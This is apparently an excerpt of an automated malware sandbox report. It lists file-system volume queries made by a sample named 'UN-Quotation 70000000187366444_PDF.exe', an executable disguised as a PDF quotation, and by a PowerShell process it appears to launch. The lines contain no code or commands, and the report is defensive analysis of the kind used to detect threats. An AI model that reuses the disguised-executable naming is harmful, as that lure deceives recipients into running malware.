                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
